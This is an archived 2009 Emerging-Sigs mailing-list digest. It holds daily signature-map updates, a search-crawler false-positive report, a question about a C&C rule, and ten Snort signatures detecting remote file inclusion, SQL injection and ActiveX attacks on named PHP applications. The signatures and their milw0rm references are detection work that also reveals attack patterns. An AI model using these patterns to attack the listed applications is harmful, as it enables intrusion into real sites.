url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From r.fulton at auckland.ac.nz Sat May 23 06:26:37 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Sat, 23 May 2009 22:26:37 +1200
Subject: [Emerging-Sigs] search engine crawler FP for ET WEB_SPECIFIC Xoops SQL Injection Attempt -- print.php id UPDATE
Message-ID:

Have a couple of web sites triggering this with two different crawlers.

R

META
--------
SID CID TimeStamp Signature
6 3226808 2009-05-23 04:23:21 ET WEB_SPECIFIC Xoops SQL Injection Attempt -- print.php id UPDATE
Sig ID 2006491
Sensor Hostname Sensor Interface
monitor-dmzo.isec.auckland.ac.nz dmz sensor

IP
--------
Source Address Dest Address Ver Hdr Len
65.55.211.160 130.216.33.86 4 5
TOS length ID flags offset TTL chksum
0 327 14981 2 0 116 4646

TCP
--------
Source Port Dest Port Seq Ack
14453 80 1746675607 806064331

DATA
--------
GET /mod/glossary/print.php?id=81&mode=date&hook=&sortkey=UPDATE&sortorder=asc&offset=0 HTTP/1.1..Accept: */*..Host: icmi.math.auckland.ac.nz..Accept-Encoding: gzip, deflate..From: msnbot(at)microsoft.com..User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm)..Connection: Close....

From emerging at emergingthreats.net Sat May 23 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 23 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090523200011.A933A4504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 23 16:00:11 2009 [***]

[*] Rules modifications: [*]
None.
[+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (44): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host 
Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (44): 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised 
or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host 
Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sun May 24 16:00:11 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sun, 24 May 2009 16:00:11 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090524200011.A47744504B@goliath.jonkmans.com> [***] Results from Oinkmaster started Sun May 24 16:00:11 2009 [***] [*] Rules modifications: [*] None. 
[+++] Added non-rule lines: [+++]

    -> Added to emerging-sid-msg.map (4):
       2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

    -> Added to emerging-sid-msg.map.txt (4):
       2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From markus.lude at gmx.de Sun May 24 20:01:51 2009
From: markus.lude at gmx.de (Markus Lude)
Date: Mon, 25 May 2009 02:01:51 +0200
Subject: [Emerging-Sigs] sig 2404007 FP?
Message-ID: <20090525000151.GA8855@fuseki.my.domain>

Hello,

I have hits on sig 2404007 (bot c&c) from 213.236.208.178. The IP address resolves to {irc,list}.opera.com. Are there really problems with that server? If yes, which one, and did anyone try to resolve them? Or could we just drop that address from the rule?
Regards,
Markus

From signatures at stillsecure.com Mon May 25 09:16:47 2009
From: signatures at stillsecure.com (signatures)
Date: Mon, 25 May 2009 07:16:47 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-25-2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292F@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1. WEB-PHP Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Beerwins PHPLinkAdmin linkadmin.php page Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/linkadmin.php?"; nocase; uricontent:"page="; nocase; pcre:"/page=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8216; reference:bugtraq,34129; sid:2009079; rev:1;)

2. WEB-PHP Beerwins PHPLinkAdmin edlink.php linkid Parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Beerwins PHPLinkAdmin edlink.php linkid Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/edlink.php?"; nocase; uricontent:"linkid"; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8216; reference:bugtraq,34129; sid:2009080; rev:1;)

3. WEB-PHP EasySiteNetwork Riddles Complete Website riddle.php riddleid Parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasySiteNetwork Riddles Complete Website riddle.php riddleid Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/riddle.php?"; nocase; uricontent:"riddleid="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,29966; reference:url,milw0rm.com/exploits/5946; sid:2009231; rev:1;)

4. WEB-PHP cmsWorks lib.module.php mod_root Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP cmsWorks lib.module.php mod_root Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/lib.module.php?"; nocase; uricontent:"mod_root"; nocase; pcre:"/mod_root=\s*(https?|ftps?|php)/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5921; reference:bugtraq,29914; sid:2009082; rev:1;)

5. WEB-PHP DeluxeBB misc.php qorder Parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP DeluxeBB misc.php qorder Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/misc.php?"; nocase; uricontent:"sub=memberlist"; nocase; uricontent:"qorder="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,34174; reference:url,milw0rm.com/exploits/8240; sid:2009085; rev:1;)

6. WEB-PHP Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/admin.rssreader.php?"; nocase; uricontent:"mosConfig_live_site="; nocase; pcre:"/mosConfig_live_site=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,vupen.com/english/advisories/2008/3119; reference:bugtraq,32265; reference:url,milw0rm.com/exploits/7096; sid:2009242; rev:1;)

7. WEB-PHP Boonex Dolphin HTMLSax3.php Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin HTMLSax3.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/HTMLSax3.php?"; nocase; uricontent:"dir[plugins]="; nocase; pcre:"/dir\[plugins\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009108; rev:1;)

8. WEB-PHP Boonex Dolphin safehtml.php Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin safehtml.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/safehtml.php?"; nocase; uricontent:"dir[plugins]="; nocase; pcre:"/dir\[plugins\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009109; rev:1;)

9. WEB-PHP Boonex Dolphin content.inc.php Remote File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Boonex Dolphin content.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/inc/content.inc.php?"; nocase; uricontent:"sIncPath="; nocase; pcre:"/sIncPath=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6024; reference:bugtraq,30136; sid:2009110; rev:1;)

10. WEB-ATTACKS Symantec Norton Ghost EasySetupInt.dll ActiveX Multiple Remote Denial of Service

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Symantec Norton Ghost EasySetupInt.dll ActiveX Multiple Remote Denial of Service"; flow:to_client,established; content:"CLSID"; nocase; content:"7972D5BE-2213-4B28-884C-F8F82432EAA5"; nocase; distance:0; pcre:"/(SetupDeleteVolume|GetBackupLocationPath|CallUninstall|CanUseEasySetup|CallAddInitialProtection|CallTour)/i"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8523; reference:bugtraq,34696; sid:7499; rev:1;)

Looking forward to your comments, if any.

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090525/754bf007/attachment.html

From eoin.miller at trojanedbinaries.com Mon May 25 12:59:54 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Mon, 25 May 2009 12:59:54 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A142D5E.4050201@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
Message-ID: <4A1ACE8A.2040205@trojanedbinaries.com>

Can't believe this didn't occur to me sooner, but if reversing the flow/direction is really going to be a problem, why not look for the response SYN/ACK packet instead of the initial SYN when setting up the TCP connection?

alert tcp [] any -> $HOME_NET any (flags: SA;) = alert!
alert tcp $HOME_NET any -> [] any (flags: SA;) = nothing

Now back to Memorial Day yard work....

-- 
Eoin Miller

Matt Jonkman wrote:
> What if, ignoring the reversing homenet/extnet thing, we just go with
> flow:established on the tcp sigs and make it directionless?
>
> That'll eliminate a lot of the noise and only give you an alert when you
> have a box talking to them.
>
> Then we don't need to open a new sid range or reverse the directions, so
> no one has to redo blocking/response rules.
>
> Matt
>

From emerging at emergingthreats.net Mon May 25 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 25 May 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090525200012.140A84504C@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon May 25 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (12):
    -> Removed from emerging-sid-msg.map.txt (12):
From phatbuckett at gmail.com Mon May 25 17:11:38 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Mon, 25 May 2009 14:11:38 -0700
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1ACE8A.2040205@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com> <4A13383B.1000608@jonkmans.com> <4A136CA5.1080303@trojanedbinaries.com> <20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com> <4A1ACE8A.2040205@trojanedbinaries.com>
Message-ID: <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>

Some may be interested in attempts to communicate and not only established connections. The 'any' port spec may allow ports that are filtered, for example, but it can be useful to know about connection attempts regardless.

DS

On Mon, May 25, 2009 at 9:59 AM, Eoin Miller wrote:
> Can't believe this didn't occur to me sooner, but if reversing the
> flow/direction is really going to be a problem, why not look for the
> response SYN/ACK packet instead of the initial SYN when setting up the
> TCP connection?
>
